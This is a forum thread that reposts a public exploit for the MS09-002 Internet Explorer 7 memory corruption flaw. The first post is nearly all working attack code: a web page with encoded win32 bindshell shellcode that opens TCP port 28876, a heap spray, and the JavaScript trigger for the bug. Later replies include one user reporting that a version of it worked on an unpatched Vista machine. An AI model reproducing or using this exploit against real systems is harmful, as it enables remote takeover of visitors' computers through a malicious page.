Results 1 to 4 of 4

Thread: 2009-02-20 MS09-002 exploit (MS Internet Explorer 7 Memory Corruption)

  1. #1
    Just burned his ISO
    Join Date
    Feb 2009
    Posts
    1

    Default 2009-02-20 MS09-002 exploit (MS Internet Explorer 7 Memory Corruption)

    milw0rm.c.o.m/exploits/8079




    <!--
    Internet Explorer 7 Uninitialized Memory Corruption Exploit

    microsoft.c.o.m/technet/security/bulletin/MS09-002.mspx

    Abyssec Inc Public Exploits 2009/2/18

    this Exploit is based on N/A PoC in Milw0rm but The PoC was really simple to
    exploit this PoC can be exploit on DEP-Enabled System As well using .Net
    Shellcode trick or etc mayve i write Dep-Enabled version too And also
    i should notice , this code can modify to be more reliable ..

    Feel free to visit us at : Abyssec.c.o.m
    to contact me directly use : admin@abyssec.c.o.m

    Note : Tested and Worked On XP SP2 please wait for another version
    -->

    <script language="JavaScript">

    // Skyland win32 bindshell (28876/tcp) shellcode
    // If you want an evill Shellcode go ahead !!!

    var shellcode=unescape("%u4343%u4343%u43eb%u5756%u458b %u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u 41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75 c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b %u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u 8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub8 66%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb %ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%u ffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uff ff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934 %u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%u ccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff 42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff %u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u 89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u56 56%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353 %u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u 5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%uff fe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe %u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u 615c%u89eb");

    var array = new Array();

    //Don't need change but for execute time you can change

    var calc = 0x100000-(shellcode.length*2+0x01020);

    // Spray or Not :-??

    var point = unescape("%u0D0D%u0D0D");
    while(point.length<calc) { point+=point;}
    var sec = point.substring(0,calc/2);
    delete point;

    for(i=0; i<0xD0; i++) {
    array[i] = sec + shellcode;
    }

    // N/A Code

    CollectGarbage();

    var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA ");
    var a1 = new Array();
    for(var x=0;x<500;x++) a1.push(document.createElement("img"));
    o1=document.createElement("tbody");
    o1.click;
    var o2 = o1.cloneNode();
    o1.clearAttributes();
    o1=null; CollectGarbage();
    for(var x=0;x<a1.length;x++) a1[x].src=s1;
    o2.click;
    </script>

    # milw0rm.c.o.m [2009-02-20]

  2. #2
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    13

    Default

    Not to be rude or anything... but, whats the point?

    Most remote exploit users are aware of latest PoC's...

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    I personally think, 'information' should be published on as many place as possible. This helps to increase awareness.. for example, i missed this exploit & just got it now....
    thank you scorpiion. keep it up

  4. #4
    Just burned his ISO
    Join Date
    Feb 2008
    Posts
    3

    Default

    Thanks Scorpion for the update,

    I used the python version and I tested it on a Vista machine. It worked without the firewall and the AV on. The AV detects as a trojan.

    Obviously this vista machine didn't have the update ms09.

    Cheers

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •